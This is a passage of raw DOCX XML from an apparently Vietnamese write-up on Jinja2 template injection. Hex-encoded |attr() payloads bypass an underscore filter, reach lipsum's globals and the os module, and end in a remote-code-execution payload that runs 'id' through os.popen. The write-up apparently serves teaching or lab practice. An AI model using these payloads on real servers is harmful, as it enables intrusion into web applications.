      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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hex.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Thử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|attr()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kết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hợp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string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tránh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dấu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_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trực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tiếp:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="288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198" w:after="133" w:lineRule="auto" w:line="371"/>
        <w:ind w:left="382" w:right="478" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="289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{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasse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s\x5f\x5f')()}}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bookmarkEnd w:id="289"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="133" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="290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PASS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rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:eastAsia="Wingdings 2" w:cs="Wingdings 2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:sym w:font="Wingdings 2" w:char="F050"/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encoding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hoàn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toàn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bypass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được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underscore!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29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1"/>
      <w:bookmarkEnd w:id="29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2"/>
      <w:bookmarkEnd w:id="29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3"/>
      <w:bookmarkEnd w:id="29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4"/>
      <w:bookmarkEnd w:id="29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5"/>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="51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296"/>
      <w:bookmarkEnd w:id="296"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="51" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="297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4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId13" w:type="default"/>
          <w:footerReference r:id="rId14" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1379" w:bottom="238" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:textDirection w:val="lrTb"/>
          <w:type w:val="continuous"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2764"/>
          <w:tab w:val="left" w:pos="3981"/>
        </w:tabs>
        <w:spacing w:before="1" w:after="121" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="311"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>Bước</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/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2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/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Truy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/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cập</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/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  <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>của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lipsum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="121" w:after="296" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="312"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Áp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dụng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encoding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cho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toàn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bộ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tên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attribute,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|attr()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dấu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chấm:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312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296" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="382" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="313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{{lipsum|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="57" w:lineRule="auto" w:line="177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314"/>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="57" w:after="269" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="315"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Giải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mã: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\x67\x6c\x6f\x62\x61\x6c\x73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globals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="269" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="316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PASS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rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:eastAsia="Wingdings 2" w:cs="Wingdings 2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:sym w:font="Wingdings 2" w:char="F050"/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Dump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được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toàn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bộ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global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namespace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của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Jinja2!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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17"/>
      <w:bookmarkEnd w:id="31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18"/>
      <w:bookmarkEnd w:id="31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19"/>
      <w:bookmarkEnd w:id="31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0"/>
      <w:bookmarkEnd w:id="32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1"/>
      <w:bookmarkEnd w:id="32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2"/>
      <w:bookmarkEnd w:id="32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3"/>
      <w:bookmarkEnd w:id="32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4"/>
      <w:bookmarkEnd w:id="32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5"/>
      <w:bookmarkEnd w:id="32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6"/>
      <w:bookmarkEnd w:id="32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7"/>
      <w:bookmarkEnd w:id="32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8"/>
      <w:bookmarkEnd w:id="32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29"/>
      <w:bookmarkEnd w:id="32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0"/>
      <w:bookmarkEnd w:id="33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1"/>
      <w:bookmarkEnd w:id="33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2"/>
      <w:bookmarkEnd w:id="33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3"/>
      <w:bookmarkEnd w:id="33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4"/>
      <w:bookmarkEnd w:id="33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5"/>
      <w:bookmarkEnd w:id="33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6"/>
      <w:bookmarkEnd w:id="33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7"/>
      <w:bookmarkEnd w:id="33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8"/>
      <w:bookmarkEnd w:id="33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39"/>
      <w:bookmarkEnd w:id="33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40"/>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="12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41"/>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2413"/>
          <w:tab w:val="left" w:pos="3189"/>
          <w:tab w:val="left" w:pos="5456"/>
          <w:tab w:val="left" w:pos="6108"/>
          <w:tab w:val="left" w:pos="6386"/>
          <w:tab w:val="left" w:pos="7017"/>
          <w:tab w:val="left" w:pos="7294"/>
          <w:tab w:val="left" w:pos="8184"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="1412" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="342"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>Hình</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11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pacing w:val="11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pacing w:val="9"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>globals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z w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79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thành</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79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công,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79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thấy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79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pacing w:val="13"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>name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z w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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pacing w:val="10"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>jinja2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z w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/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pacing w:val="10"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="1412" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="343"/>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="1412" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="344"/>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="62" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="1412" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="345"/>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="63" w:after="121" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="346"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>Bước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3: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Lấy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module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os</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2107"/>
          <w:tab w:val="left" w:pos="3087"/>
        </w:tabs>
        <w:spacing w:before="121" w:after="290" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="347"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Từ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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globals,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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pacing w:val="5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  <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>getitem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/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lấy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module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os.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Encode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hết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bằng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hex:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347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291" w:after="133" w:lineRule="auto" w:line="371"/>
        <w:ind w:left="382" w:right="2524" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="348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{{lipsum|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-6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526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|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x6f\x73')}}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bookmarkEnd w:id="348"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="133" w:after="268" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="349"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Giải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mã: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\x67\x65\x74\x69\x74\x65\x6d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getitem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color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>|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\x6f\x73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os</w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="269" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="350"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>→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PASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:eastAsia="Wingdings 2" w:cs="Wingdings 2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:sym w:font="Wingdings 2" w:char="F050"/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Truy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cập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được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module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os!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35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1"/>
      <w:bookmarkEnd w:id="35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2"/>
      <w:bookmarkEnd w:id="35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3"/>
      <w:bookmarkEnd w:id="35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4"/>
      <w:bookmarkEnd w:id="35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5"/>
      <w:bookmarkEnd w:id="35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6"/>
      <w:bookmarkEnd w:id="35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7"/>
      <w:bookmarkEnd w:id="35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8"/>
      <w:bookmarkEnd w:id="35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59"/>
      <w:bookmarkEnd w:id="35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0"/>
      <w:bookmarkEnd w:id="36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1"/>
      <w:bookmarkEnd w:id="36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2"/>
      <w:bookmarkEnd w:id="36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3"/>
      <w:bookmarkEnd w:id="36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4"/>
      <w:bookmarkEnd w:id="36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5"/>
      <w:bookmarkEnd w:id="36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6"/>
      <w:bookmarkEnd w:id="36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7"/>
      <w:bookmarkEnd w:id="36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8"/>
      <w:bookmarkEnd w:id="36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69"/>
      <w:bookmarkEnd w:id="36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70"/>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="52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371"/>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="52" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="372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5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId15" w:type="default"/>
          <w:footerReference r:id="rId16" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1381" w:bottom="238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388"/>
      <w:bookmarkEnd w:id="38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9"/>
      <w:bookmarkEnd w:id="3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0"/>
      <w:bookmarkEnd w:id="39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1"/>
      <w:bookmarkEnd w:id="39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2"/>
      <w:bookmarkEnd w:id="39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3"/>
      <w:bookmarkEnd w:id="39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4"/>
      <w:bookmarkEnd w:id="39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5"/>
      <w:bookmarkEnd w:id="39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6"/>
      <w:bookmarkEnd w:id="39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7"/>
      <w:bookmarkEnd w:id="39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8"/>
      <w:bookmarkEnd w:id="39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9"/>
      <w:bookmarkEnd w:id="39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0"/>
      <w:bookmarkEnd w:id="40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1"/>
      <w:bookmarkEnd w:id="40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2"/>
      <w:bookmarkEnd w:id="40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3"/>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="21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4"/>
      <w:bookmarkEnd w:id="404"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="22" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="3411" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="405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5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os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module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accessible!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="3411" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="406"/>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="3411" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="407"/>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="62" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="3411" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="408"/>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:spacing w:before="63" w:after="406" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="409"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t>6.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Remote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Code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Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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349250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="410" name="Image 4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28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631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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="407" w:after="121" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="411"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>6.1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Payload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RCE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hoàn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chỉnh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="121" w:after="289" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="412"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Gọi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os.popen().read()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thực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lệnh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shell,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encode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toàn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bộ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bằng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hex:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/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289" w:after="127" w:lineRule="auto" w:line="371"/>
        <w:ind w:left="382" w:right="2115" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="413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{{lipsum|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-6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935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|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x6f\x73')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-58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526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|attr('\x70\x6f\x70\x65\x6e')('\x69\x64')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:w w:val="92"/>
          <w:spacing w:val="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|attr('\x72\x65\x61\x64')()}}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bookmarkEnd w:id="413"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="128" w:after="0" w:lineRule="auto" w:line="337"/>
        <w:ind w:left="182" w:right="195" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="414"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Giải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mã: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•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\x70\x6f\x70\x65\x6e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popen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/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color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>•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\x69\x64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pacing w:val="80"/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id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
